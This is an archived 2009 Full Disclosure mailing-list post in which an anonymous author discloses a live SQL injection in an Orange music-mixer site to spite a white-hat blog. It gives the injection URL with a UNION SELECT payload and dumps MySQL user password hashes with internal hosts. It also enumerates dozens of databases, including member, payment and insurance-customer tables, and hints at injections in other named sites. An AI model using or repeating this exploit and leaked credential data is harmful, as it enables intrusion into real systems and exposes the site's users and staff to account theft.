Full Disclosure mailing list archives
HackersBlog: WhiteHat Scum
From: whitehatscum () hush ai
Date: Thu, 28 May 2009 18:43:29 +0100
NP: Down - Jay Sean ft. Lil Wayne Right. -- NOTICE**: THIS IS NOT AN ATTACK ON ORANGE, IM FED UP WITH WHITEHAT BASTARDS POSTING ALL THEIR CRAP. NO-ONE GIVES A FUCK, WE GOT THE POINT, NOW STOP BEFORE YOU PISS EVEN MORE PEOPLE OFF. -- Ive had enough of your fucking whitehat disclosure, so Im going to be disclosing sqls completelely irresponsibly, complete with database dumps, etc etc. Fuck you. Basically the plan was to expose this bug before you, but it seems another do-gooder was on the case. Damn. Sucks to be you anyway, I've had this bug for about 3 months. So, basically, Im going to tell everyone where the fuck this bug is. Sorry Orange, anyone affected by this. I guess tonight I let the kid inside out. Blame HackersBlog. Fuck you hackersblog, for showing how goddamn bad an sql injection is. This server is run by daily.co.uk. YES HACKERSBLOG, IT ISNT AN OFFICIAL ORANGE.CO.UK SERVER, AND ISNT CONNECTED WITH THEIR MAIN WEBSITE. *shock* PATH: /disk/home/pointblankftp/orangemixer/mixerweb/ Server info; DB: orangemixer (NOT FOR LONG, ENUMERATION FTW) user(): mixer@172.30.1.80 Mysql VER: 5.0.32-Debian_7etch1-log NP: R.O.O.T.S - Flo Rida mysql.user hashes localhost:root:558d6f483ea11dfb localhost:debian sys- maint:*46C8AF861EBF825A181B4CE0239F5DE73F7B668E 172.30.1.235:nagioscheck:4e199f4042a61be2 172.30.1.209:replicator:*E0830EF8EC2A9D75B0E5BAA867845D5E99E6CD77 %:statcheck:313911396edb17c7 172.30.1.70:hypeadmin:*99ECE6D0716E7C2FF13C2B9B489C56B54AD8CE48 84.45.12.211:tibroot:*2DEF776957EB1E8D5C51E9FB64167876A1F2720B 172.30.1.219:bikingneeds:*2BA86DF19B2253BC6C46499D71C69990805EF1F8 84.45.12.211:kirk:*81D69EADA54E3C189C064C9B505807D2AD819F6F 172.30.1.235:wikiuser:*B0E342E7C7B4458184DD7F4FBB29A8662B528848 172.30.1.80:hypeadmin:*99ECE6D0716E7C2FF13C2B9B489C56B54AD8CE48 212.49.204.130:tibreader:*4F16C2B5304F77E16A7FDCF595D5010B2020283C 172.30.1.221:bikingneeds:*2BA86DF19B2253BC6C46499D71C69990805EF1F8 172.30.1.219:fc:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4 172.30.1.221:fc:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4 172.30.1.220:fc:N 172.30.1.220:fcselect:*8CF4773A25CECF8E153AE5E206535EEE7A454AD4 172.30.1.80:schoolsmixer:*22F1B42F8C50ABB2C00419CDFE68184DC4EA274A 172.30.1.80:mixer:*7DF16724880AEAF28CA1DA24D93E3304BFFB6532 172.30.1.80:teenkmixer:*81888B215271930A990B5715D242A30E62BD191A 172.30.1.70:renderer:*9110B92FA01DC8BC6D02C017505EDE2D1D0D47D8 172.30.1.70:mixer:*7DF16724880AEAF28CA1DA24D93E3304BFFB6532 172.30.1.70:teenkmixer:*81888B215271930A990B5715D242A30E62BD191A 172.30.1.70:schoolsmixer:*22F1B42F8C50ABB2C00419CDFE68184DC4EA274A 172.30.1.70:pbmixer:*0A47AAA2E4F79C623C272A6ACB2C674AB8ECF75C 172.30.1.80:renderer:*9110B92FA01DC8BC6D02C017505EDE2D1D0D47D8 172.30.1.80:pbmixer:*0A47AAA2E4F79C623C272A6ACB2C674AB8ECF75C 172.30.1.80:pointblankdb:*A5B6D0A4201A17B0CB60FA7FA36F062029683A92 172.30.1.70:pointblankdb:*A5B6D0A4201A17B0CB60FA7FA36F062029683A92 172.30.1.70:pblearning:*D133C50E0A402163BBD26AC5D8C6136C4AABBE9A 172.30.1.80:pblearning:*D133C50E0A402163BBD26AC5D8C6136C4AABBE9A 172.30.1.70:db_pointbl_wrdp1:*A1826A0C207A5A4A4DDE1BF3229353C364040 E37 172.30.1.70:db_pbmusic:*EC23EA59532A54F4630481380A843C2BB7B69D54 172.30.1.70:db_pbl_shop:*4E342D7F6F0FC012DCE765F85F082E2E6B5020DC 172.30.1.70:epoikuser:*E6591B87F54809F5DFD73A8F75666C0B3FC3CD1B %:monitor:*28DFC4B1E76C94077186F47078963DFF9D79331E localhost:backup:*2BD06E765955E7DA34354171D4AB0927A1DB7D69 172.30.1.80:db_pointbl_wrdp1:*A1826A0C207A5A4A4DDE1BF3229353C364040 E37 172.30.1.80:db_pbmusic:*EC23EA59532A54F4630481380A843C2BB7B69D54 172.30.1.80:db_pbl_shop:*4E342D7F6F0FC012DCE765F85F082E2E6B5020DC 172.30.1.80:epoikuser:*E6591B87F54809F5DFD73A8F75666C0B3FC3CD1B %:hypeadmin:N 172.30.1.105:tamar_wordpress:*FDE232A185E30264C640E8ED6C64177A2A2DA B11 Hm... I wonder what DB's we can access...... bikingneeds epoikcom_pointblankonline fc_needs mysql nocmediawiki orangemixer pbmixer pointbl_shop pointbl_wrdp1 pointblanklearning pointblankmusic schoolsmixer tamar_blog teenkmixer test thehype tiberius tiberius_test sweet, wow, this sure is a lot more helpful than the whitehat scum at hackersblog.org make everything DB: bikingneeds Table: Columns affiliate: affiliate_id,phone_number,tag,keyword_category,insert_datetime,updat e_datetime business_type: business_type_id,business_type,insert_datetime,update_datetime,busin ess_code immobiliser: immobiliser_id,immobiliser_code,description,insert_datetime,update_d atetime insurance: insurance_id,title,panel_code,name,insert_datetime,update_datetime insuranceimage: insuranceimage_id,insurance_id,image,insert_datetime,update_datetime occupation: occupation_id,occupation,insert_datetime,update_datetime,occupation_ codequote: quote_id,quote_name,product_name,customer_name,finished,deleted,sess ion_key,quote_ref,tracking_ref,date_last_edited,date_completed,retur ned_to,page_completed,insert_datetime,update_datetime quote_data: quote_data_id,quote_id,name,value,insert_datetime,update_datetime quote_group: quote_group_id,parent_quote_id,child_quote_id,insert_datetime,update _datetime quote_qx_link: quote_qx_link_id,quote_id,insert_datetime,update_datetime quote_refs: quote,prefix,max_number,next_number quote_titles: quote_titles_id,title,field,section,insert_datetime,update_datetime qxresults: qxresults_id,quote_postion,quote_qx_link_id,name,value,insert_dateti me,update_datetime session: session_id,session_key,tag,insert_datetime,update_datetime user: user_id,email,password,user_status,insert_datetime,update_datetime vehicle_make: vehicle_make_id,make,insert_datetime,update_datetime vehicle_model: vehicle_model_id,vehicle_make_id,model,engine_size,manufacture_start _year,manufacture_end_year,abi_code,insert_datetime,update_datetime vehicle_model_desc: vehicle_model_desc_id,vehicle_model_id,model_desc,insert_datetime,up date_datetime DB: epoikcom_pointblankonline Table: Columns announcements: ID,postdate,text,classroomID,memberID answers: ID,questionID,answerNumber,answerText,answerStatus assignments: ID,studentID,lessonID,formID,commentID,status,uploadDate,reviewDate c_classrooms: ID,moduleID,startDate,secondDay,thirdDay,classSize,timetable,studio, ocnRegCode,ocnRAC c_courses: ID,name,moduleList,topic,duration,type,live,homeDisplay,listPosition ,content,related,resources,faq,payFull,payDepQ,payInsQCount,payInsQ, payDepM,payInsMCount,payInsM,filename,metaTitle,metaDescription,meta Keywords,pdfFile c_interests: ID,name c_jobs: ID,post,employer,text,status,listPosition c_modules: ID,name,price,topic,live,duration,content,filename,metaTitle,metaDes cription,metaKeywords,related,resources,faq,feedback c_news: ID,title,content,date,thumbnail,slot c_payments: ID,studentID,due,dueDate,paid,paidDate,discount,type,method,bookDate ,futurepayID,number c_profiles: ID,name,title,text,photo,type,listPosition c_rotatingcontent: ID,content,live,pos,delay c_students: ID,memberID,classroomID,moduleID,courseID,bookDate,reservedPlace,pay ment,notes,confLetterSent,ocnLevel,ocnPoints,ocnCertRec,ocnCertSendD ate c_studios: ID,name,size c_testimonials: ID,author,text,moduleID classrooms: ID,moduleID,startDate,tutorID,chatRoom,chatDay,chatTime comments: ID,classroomID,formID,answer,postdate,file,text,pageID,membernicknam e,memberID countries: ID,name,code2letter,code3letter,codeNumeric,currency,banned currencies: currency,rate elements: ID,pageID,elementNumber,elementType,elementContent,elementFile,eleme ntWidth,elementHeight errors: ID,error,errorDate,solution,solutionDate,solved feedbackanswers: ID,classroomID,memberID,formID,questionID,questionNumber,userAnswerI D,userAnswerText forumcomments: ID,classroomID,answer,postdate,file,text,membernickname,memberID,las tanswerdate,title geoiploc_test: IP,country,currency homepollresults: IP,country,genre inforequests: ID,moduleID,memberID lessons: ID,lessonName,lessonNumber,lessonSyllabus,moduleID,live members: ID,nickname,password,email,firstname,lastname,title,address,country, postcode,phone,howhear,profile,age,birthDate,regDate,timezoneID,time zoneDST,genres,newsletter,updates,notifyall,notifyanswer,securitylev el,realemail,visaRequired,howToStudy,interest,availability,status,ex perience,registeredAt,ethnicity,religion,employmentStatus,ocnID members_copy: ID,nickname,password,email,firstname,lastname,title,address,country, postcode,phone,howhear,profile,age,birthDate,regDate,genres,newslett er,updates,notifyall,notifyanswer,securitylevel,realemail,howToStudy ,interest,availability,status,experience,registeredAt,ethnicity,reli gion,employmentStatus,ocnID modules: ID,moduleName,moduleNumber,moduleLongDescription,moduleShortDescript ion,type,listPosition,tutorProfile,developerID,studentFeedback,modul eRequirements,live,free,freesample,landingPageID,payFull,payDepQ,pay InsQCount,payInsQ,payDepM,payInsMCount,payInsM,lessonsNumber,fileNam e,metaTitle,metaDescription,metaKeywords,related p_features: ID,name p_genres: ID,name p_moods: ID,name p_tunes: ID,artist,title,filename,genres,moods,features pages: ID,pageName,pageNumber,lessonID,live payments: ID,studentID,due,dueDate,paid,paidDate,discount,type,method,bookDate ,futurepayID,number questions: ID,formID,questionNumber,questionText,questionType referralexpences: ID,referralID,date,amount,school referrals: ID,name,category,listPosition rotatingcontent: ID,content,live,pos,delay sessions: session_id,session_data,expires status: ID,priority,postDate,dueDate,postedBy,postedFor,description,status,c omment students: ID,memberID,classroomID,moduleID,payment,bookDate,reservedPlace,note s,confLetterSent testanswers: ID,classroomID,memberID,formID,questionID,questionNumber,userAnswerI D,correctAnswerID testimonials: ID,number,text,sign,country testscompleted: ID,memberID,classroomID,completeDate timezone: timezoneid,gmt_offset,dst_offset,timezone_code,name DB: fc_needs Table: Columns additional_driver: id,partial_id,request_id,title,forenames,surname,date_of_birth,sex,r esident_since,marital_status,relation_to_proposer,ft_employment_stat us,ft_employer_code,ft_occupation_code,pt_employment_status,pt_emplo yer_code,pt_occupation_code,smoker,license_type,license_date,how_man y_tests,access_other_vehicles,motoring_org,insert_time broker: id,name,email,telephone,24_hour_claims,uk_call_centre,buy_online,ulr _expenses,breakdown_available,breakdown_options,courtesy_van,windscr een_cover,personal_accident,insert_time,update_time claim: id,partial_id,request_id,driver_id,claim_code,claim_date,insured_cos t,third_party_cost,ncb_affected,personal_injury,accepted_fault,inser t_time claim_code: id,code,qx_code,description,insert_time conviction: id,partial_id,request_id,driver_id,conviction_code,conviction_date,f ine,penalty_points,length_of_ban,alcohol_reading_type,alcohol_readin g_level,related_accident,insert_time employer_code: id,code,description,insert_time job: id,type,request_id,params,result,created,started,stopped,expires,sta tus occupation_code: id,code,description,insert_time partial_request: id,user_id,site,submitted,request_id,inception_date,cover_required,a llowed_drivers,class_of_use,ncb_years,ncb_protected,policy_protected ,voluntary_excess,total_mileage,business_mileage,title,forenames,sur name,date_of_birth,sex,resident_since,marital_status,ft_employment_s tatus,ft_employer_code,ft_occupation_code,pt_employment_status,pt_em ployer_code,pt_occupation_code,abode_type,flat_name_or_number,door_n umber,address1,address2,address3,address4,address5,address6,town,cou nty,postcode,daytime_phone,evening_phone,mobile_phone,email,smoker,h omeowner,license_type,license_date,how_many_tests,access_other_vehic les,motoring_org,registration,make,abi_code,cc,year_of_manufacture,w here_kept,postcode_where_kept,keeper,owner,purchased,value,paid,sign age,other_vehicles,immobiliser,alarm,tracker,lhd,abs,seats,trailer_c over,trailer_value,contact_now,contact_related,state,insert_time,upd ate_time quote_request: id,user_id,site,inception_date,cover_required,allowed_drivers,class_ of_use,ncb_years,ncb_protected,policy_protected,voluntary_excess,tot al_mileage,business_mileage,title,forenames,surname,date_of_birth,se x,resident_since,marital_status,ft_employment_status,ft_employer_cod e,ft_occupation_code,pt_employment_status,pt_employer_code,pt_occupa tion_code,abode_type,flat_name_or_number,door_number,address1,addres s2,address3,address4,address5,address6,town,county,postcode,daytime_ phone,evening_phone,mobile_phone,email,smoker,homeowner,license_type ,license_date,how_many_tests,access_other_vehicles,motoring_org,regi stration,make,abi_code,cc,year_of_manufacture,where_kept,postcode_wh ere_kept,keeper,owner,purchased,value,paid,signage,other_vehicles,im mobiliser,alarm,tracker,lhd,abs,seats,trailer_cover,trailer_value,co ntact_now,contact_related,insert_time,update_time quote_result: id,user_id,request_id,transaction_id,webreference,recall_url,broker_ ref,insurer_code,insurer_name,premium,compulsory_excess,voluntary_ex cess,screen_limit,audio_limit,phone_limit,contents_limit,green_card_ days,driving_other_cars,car_hire,legal_expenses,replacement_car,auth orised_repairers,deposit,monthly_amount,number_payments,insert_time security_device_code: id,vehicle_type,code,description,insert_time session: session_key,user_id,runmode,quote_id,insert_time,data user: id,username,password,insert_time,update_time user_acl: id,user_id,is_admin,update_time vehicle: id,abi_code,make,model,body_type,cc,year_from,year_to,fuel,insert_ti me DB: nocmediawiki Table: Columns archive: ar_namespace,ar_title,ar_text,ar_comment,ar_user,ar_user_text,ar_tim estamp,ar_minor_edit,ar_flags blobs: blob_index,blob_data brokenlinks: bl_from,bl_to categorylinks: cl_from,cl_to,cl_sortkey,cl_timestamp cur: cur_id,cur_namespace,cur_title,cur_text,cur_comment,cur_user,cur_use r_text,cur_timestamp,cur_restrictions,cur_counter,cur_is_redirect,cu r_minor_edit,cur_is_new,cur_random,cur_touched,inverse_timestamp hitcounter: hc_id image: img_name,img_size,img_description,img_user,img_user_text,img_timesta mp imagelinks: il_from,il_to interwiki: iw_prefix,iw_url,iw_local ipblocks: ipb_id,ipb_address,ipb_user,ipb_by,ipb_reason,ipb_timestamp,ipb_auto ,ipb_expiry links: l_from,l_to linkscc: lcc_pageid,lcc_cacheobj logging: log_type,log_action,log_timestamp,log_user,log_namespace,log_title,l og_comment,log_params math: math_inputhash,math_outputhash,math_html_conservativeness,math_html, math_mathml objectcache: keyname,value,exptime old: old_id,old_namespace,old_title,old_text,old_comment,old_user,old_use r_text,old_timestamp,old_minor_edit,old_flags,inverse_timestamp oldimage: oi_name,oi_archive_name,oi_size,oi_description,oi_user,oi_user_text, oi_timestamp querycache: qc_type,qc_value,qc_namespace,qc_title recentchanges: rc_id,rc_timestamp,rc_cur_time,rc_user,rc_user_text,rc_namespace,rc_ title,rc_comment,rc_minor,rc_bot,rc_new,rc_cur_id,rc_this_oldid,rc_l ast_oldid,rc_type,rc_moved_to_ns,rc_moved_to_title,rc_patrolled,rc_i p searchindex: si_page,si_title,si_text site_stats: ss_row_id,ss_total_views,ss_total_edits,ss_good_articles,ss_total_pa ges,ss_users,ss_admins user: user_id,user_name,user_real_name,user_password,user_newpassword,user _email,user_options,user_touched,user_token user_newtalk: user_id,user_ip user_rights: ur_user,ur_rights validate: val_user,val_title,val_timestamp,val_type,val_value,val_comment watchlist: wl_user,wl_namespace,wl_title DB: orangemixer Table: Columns comments: ID,trackID,memberID,text,date members: ID,username,password,email,firstname,lastname,birthdate,votes,bayRat ing playtimes: ID,trackID,memberID,authorID,date ratings: ID,trackID,memberID,date,rating,authorID renderqueue: ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend erStarted,renderFinished,status,errortext sessions: session_id,session_data,expires tracks: ID,title,memberID,genreID,length,publishFlag,renderFlag,description, publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c ompetition DB: pbmixer Table: Columns m_comments: ID,trackID,memberID,text,date members: ID,nickname,password,email,firstname,lastname,school,birthdate,votes ,bayRating playtimes: ID,trackID,memberID,authorID,date ratings: ID,trackID,memberID,date,rating,authorID renderqueue: ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend erStarted,renderFinished,status,errortext sessions: session_id,session_data,expires tracks: ID,title,memberID,genreID,length,publishFlag,renderFlag,description, publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c ompetition DB: pointbl_shop Table: Columns admin_users: id,username,password freecontent: id,sectionId,title,description,filename,added,contentType,ordering,d ownloadText,productId freecontent_downloadlog: id,fileId,downloaded freecontent_sections: id,parentId,sectionName,ordering,directory,description,subSectionsIn Page modules: id,moduleName,moduleNumber,added,moduleDescription,availableDVD,list Position order_files: id,orderId,fileId,downloadsRemaining,downloadCode orders: id,orderTime,sendTime,productId,wpTransId,deliveryMethod,status,warn ings,paidamount,fullName,address,postcode,country,email,phone,usersI P,dataDump,howHeard,howHeardOther podcast: id,posted,adminUserId,title,description,mediaFile product_files: id,productId,fileDescription,fileName products: id,productName,productDescription,price,added,status,productNumber,t railerFile,moduleId,summary,downloadAvailable,physicalAvailable,disp layOnHomepage DB: pointbl_wrdp1 Table: Columns wp_categories: cat_ID,cat_name,category_nicename,category_description,category_pare nt wp_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,comme nt_author_url,comment_author_IP,comment_date,comment_date_gmt,commen t_content,comment_karma,comment_approved,comment_agent,comment_type, comment_parent,user_id wp_linkcategories: cat_id,cat_name,auto_toggle,show_images,show_description,show_rating ,show_updated,sort_order,sort_desc,text_before_link,text_after_link, text_after_all,list_limit wp_links: link_id,link_url,link_name,link_image,link_target,link_category,link _description,link_visible,link_owner,link_rating,link_updated,link_r el,link_notes,link_rss wp_options: option_id,blog_id,option_name,option_can_override,option_type,option _value,option_width,option_height,option_description,option_admin_le vel,autoload wp_post2cat: rel_id,post_id,category_id wp_postmeta: meta_id,post_id,meta_key,meta_value wp_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_ category,post_excerpt,post_status,comment_status,ping_status,post_pa ssword,post_name,to_ping,pinged,post_modified,post_modified_gmt,post _content_filtered,post_parent,guid,menu_order wp_users: ID,user_login,user_pass,user_firstname,user_lastname,user_nickname,u ser_nicename,user_icq,user_email,user_url,user_ip,user_domain,user_b rowser,user_registered,user_level,user_aim,user_msn,user_yim,user_id mode,user_activation_key,user_status,user_description DB: pointblanklearning Table: Columns pages: ID,section,identifier,type,name,filename,content,listPosition,metaTi tle,metaDescription,metaKeywords sessions: session_id,session_data,expires DB: pointblankmusic Table: Columns blah: xcol features: ID,name genres: ID,name moods: ID,name tunes: ID,artist,title,filename,genres,moods,features DB: schoolsmixer Table: Columns comments: ID,trackID,memberID,text,date members: ID,username,password,email,firstname,lastname,school,birthdate,votes ,bayRating playtimes: ID,trackID,memberID,authorID,date ratings: ID,trackID,memberID,date,rating,authorID renderqueue: ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend erStarted,renderFinished,status,errortext sessions: session_id,session_data,expires tracks: ID,title,memberID,genreID,length,publishFlag,renderFlag,description, publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c ompetition DB: tamar_blog Table: Columns wp_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,comme nt_author_url,comment_author_IP,comment_date,comment_date_gmt,commen t_content,comment_karma,comment_approved,comment_agent,comment_type, comment_parent,user_id wp_links: link_id,link_url,link_name,link_image,link_target,link_category,link _description,link_visible,link_owner,link_rating,link_updated,link_r el,link_notes,link_rss wp_options: option_id,blog_id,option_name,option_value,autoload wp_postmeta: meta_id,post_id,meta_key,meta_value wp_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_ category,post_excerpt,post_status,comment_status,ping_status,post_pa ssword,post_name,to_ping,pinged,post_modified,post_modified_gmt,post _content_filtered,post_parent,guid,menu_order,post_type,post_mime_ty pe,comment_count wp_ratings: rating_id,rating_postid,rating_posttitle,rating_rating,rating_timest amp,rating_ip,rating_host,rating_username,rating_userid wp_term_relationships: object_id,term_taxonomy_id,term_order wp_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count wp_terms: term_id,name,slug,term_group wp_usermeta: umeta_id,user_id,meta_key,meta_value wp_users: ID,user_login,user_pass,user_nicename,user_email,user_url,user_regis tered,user_activation_key,user_status,display_name wp_wpum_fields: wpum_id,is_extra_field,name,label,description,type,min_length,max_le ngth,equal,value,default_value,checking_type,can_be_empty,show_durin g_reg,can_be_default,is_editable,display_row,reg_order,which_table,e rror_msg DB: teenkmixer Table: Columns comments: ID,trackID,memberID,text,date members: ID,username,password,email,firstname,lastname,birthdate,votes,bayRat ing,town,profile playtimes: ID,trackID,memberID,authorID,date,visitorIP ratings: ID,trackID,memberID,date,rating,authorID,visitorIP [188]renderqueue: ID,memberID,trackID,renderFile,mixerXML,memberEmail,publishDate,rend erStarted,renderFinished,status,errortext sessions: session_id,session_data,expires tracks: ID,title,memberID,genreID,length,publishFlag,renderFlag,description, publishDate,editDate,playTimes,mixerXML,votes,bayRating,renderFile,c ompetition DB: test Table: Columns testing: a DB: thehype Table: Columns events: ID,title,date,location,postcode,venue,description,price,organisation ,category,approved,timestamp forum: ID,answerTo,authorID,postDate,title,text news: ID,headline,content,category,timestamp organisations: ID,name,identifier,description,contact_info,category,postcode pagecomments: cID,table,itemID,ctitle,text,userid,timestamp pageratings: ID,pageID,score pages: ID,section,identifier,title,filename,content,listPosition,hassubpage s,metaTitle,metaDescription,metaKeywords,authorID,creationDate,revie werID,reviewDate,approved polls: ID,title,content,result,status,category,date sessions: session_id,session_data,expires users: ID,securityLevel,username,password,email,name,school,likes,dislikes, profile,interests,picture,reviewerID,reviewDate,approved,flagged DB tiberius Table: Columns audio_files: id,resource_id,uri,file_type,file_size,duration capabilities: name,value,group_id,device_id carriers: id,start_ip,end_ip,country_code,name devices: id,user_agent,fall_back_id,actual_device,view_path form_fields: id,resource_id,name,label form_harvests: resource_id,last_visit_id,time form_values: id,field_id,visit_id,value image_regions: id,image_id,type,x1,y1,x2,y2 images: id,resource_id,uri,format,quality,width,height,file_type,file_size invites: id,type,visitor_id,message,invited_by,sender,job_id,page_id,sent,acc epted,expires,status jobs: id,type,params,result,created,started,stopped,expires,status,progres s locations: id,site_id,resource_id,type log_requests: id,site_id,url,user_agent,device_id,visitor_id,ip_address,headers,ca rrier,request_time log_responses: id,site_id,request_id,visitor_id,handler,item_id,item_title,extra_pa rams,status,errors,response_time markups: id,fall_back_id,view_path messages: id,site_id,type,sender,title,content node_attrs: id,node_id,name,value nodes: id,parent_id,type,content,offset page_nodes: id,page_id,name,node_id pages: id,resource_id,template_id,user_id,version,status,time,notes poll_answers: id,poll_id,node_id,answer,votes poll_votes: id,poll_id,answer_id,visitor_id,vote_time,user_agent polls: id,node_id,question,allow_multivote,hide_results_until,vote_delay,to tal_votes realms: id,name,title resources: id,site_id,type,title ringtones: id,resource_id,uri,quality,file_type,file_size roles: id,name,title,about sessions: id,time,data site_keywords: site_id,keyword,shortcode sites: id,realm_id,name,title static_log_requests: id,site_id,url,user_agent,device_id,visitor_id,ip_address,headers,ca rrier,request_time static_log_responses: id,site_id,request_id,visitor_id,handler,item_id,item_title,extra_pa rams,status,errors,response_time style_props: id,name,value,style_id styles: id,title,type,site_id templates: id,resource_id,user_id,node_id,version,status,time,notes unknown_devices: id,user_agent,headers,status,time user_roles: id,site_id,user_id,role_id users: id,realm_id,username,password,name,email,status videos: id,resource_id,uri,quality,file_type,file_size visitors: id,site_id,telephone,user_agent,registered,status,name visits: id,site_id,visitor_id,resource_type,resource_id,record_id,device_id, time,status,data widgets: id,resource_id,type,user_id,node_id,version,status,time,notes DB: tiberius_test Table: Columns album_songs: id,name,album_id,song_id albums: id,title capabilities: name,value,group_id,device_id devices: id,user_agent,fall_back_id,actual_device,view_path form_fields: id,resource_id,name,label form_harvests: resource_id,last_visit_id,time form_values: id,field_id,visit_id,value image_regions: id,image_id,type,x1,y1,x2,y2 images: id,resource_id,uri,format,quality,width,height,file_type,file_size jobs: id,type,params,result,created,started,stopped,expires,status,progres s locations: id,site_id,resource_id,type markups: id,fall_back_id,view_path messages: id,site_id,type,sender,title,content node_attrs: id,node_id,name,value nodes: id,parent_id,type,content,offset page_nodes: id,page_id,name,node_id pages: id,resource_id,template_id,user_id,version,status,time,notes realms: id,name,title resources: id,site_id,type,title ringtones: id,resource_id,uri,quality,file_type,file_size roles: id,name,title,about sessions: id,time,data sites: id,realm_id,name,title songs: id,title style_props: id,name,value,style_id styles: id,title,type,site_id templates: id,resource_id,user_id,node_id,version,status,time,notes user_roles: id,site_id,user_id,role_id users: id,realm_id,username,password,name,email,status videos: id,resource_id,uri,quality,file_type,file_size visitors: id,site_id,telephone,user_agent,invite_job_id,registered,status visits: id,site_id,visitor_id,resource_type,resource_id,record_id,device_id, time,status,data widgets: id,resource_id,type,user_id,node_id,version,status,time,notes,notes Check out all the admin/user tables. Secure or what? Btw, HackersBlog.org your sql injection finding techniques suck balls. Ive found better sqls on sites with LOAD_FILE/OUTFILE that you've posted before, so really, stop playing 'eleet security guru'. You fucking suck, you should be ashamed. You aren't hackers, merely whitehat scum. We need pr0j3c7 m4yh3m back. Greetz; The BlackHat Scene, EFnet channels ( you know which chans you are ), certain hackers/groups (again, you know who you are) <3, The Mentor (dude, your manifesto pretty much describes me perfectly). Surprisingly, CounterMeasures @ TrendMicro. You seem like a pretty cool person. FuckYou; Skiddie underlings of the net I.E.; unkn0wn.ws, h4cky0u.org (I mean seriously, d13.0rg), the skids that play with milw0rm web vulns and think they're the fucking shit. And if you hadnt guessed, HackersBlog.org (stop acting like you're discovering new stuff). HackersBlog.org, if you want to email me, please do. Dont expect me to talk civilly. By the way, comments such as 'wow, this is childish' etc are stupid, merely pointing out that you think you are somehow superior. Trust me, you arent. While kids like us are rare, we are around. Oh yeh, the sql injection. Wow, this was hard to find. I muzt be sum kinda pr0 haqqir. http://mixer.orange.co.uk/explore.php?t=tr&id=-23 UNION ALL SELECT 1-- (btw, this should still be alive....) Thanks. Pz. btw; Im feeling generous. Times Online appears to run Oracle, it's rather sexy. I <3 injections in TimesOnline.co.uk. Wonder if you can find it.... Also, you missed other vulns in loads of sites you already published articles about, but why would I help you? Go find it yourself. I'll give you a bone, some of them have LOAD_FILE AND OUTFILE :o:o:o:o:o:o:o:o Maybe you can become a real 'hacker'? BTW, you suck. I just found another vuln in orange.co.uk, on their main site. Wow. Not quite as serious as it isnt fully exploitable (yet, h4h4h), but it is there. Im not releasing it. I'm not a disclosing whore that has turned the scene into a business. Scum. If you want to have a direct conversation, put a few messages in some major, well known blackhat chans on EFnet. I will message you. Email me at whitehatscum () hush ai -- Improve your driving ability with a stop at traffic school. Click now! http://tagline.hushmail.com/fc/BLSrjkqhynusaiIkQ34Hyfhk1tu7thT41zOaiiZX9VHPHaKrp669uhxzv1W/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- HackersBlog: WhiteHat Scum whitehatscum (May 28)
- Re: HackersBlog: WhiteHat Scum RoMeO (May 28)
- Re: HackersBlog: WhiteHat Scum Jeremy Brown (May 28)
- Re: HackersBlog: WhiteHat Scum Nelson Brito (May 28)
- Re: HackersBlog: WhiteHat Scum Jeremy Brown (May 28)
- Re: HackersBlog: WhiteHat Scum RoMeO (May 28)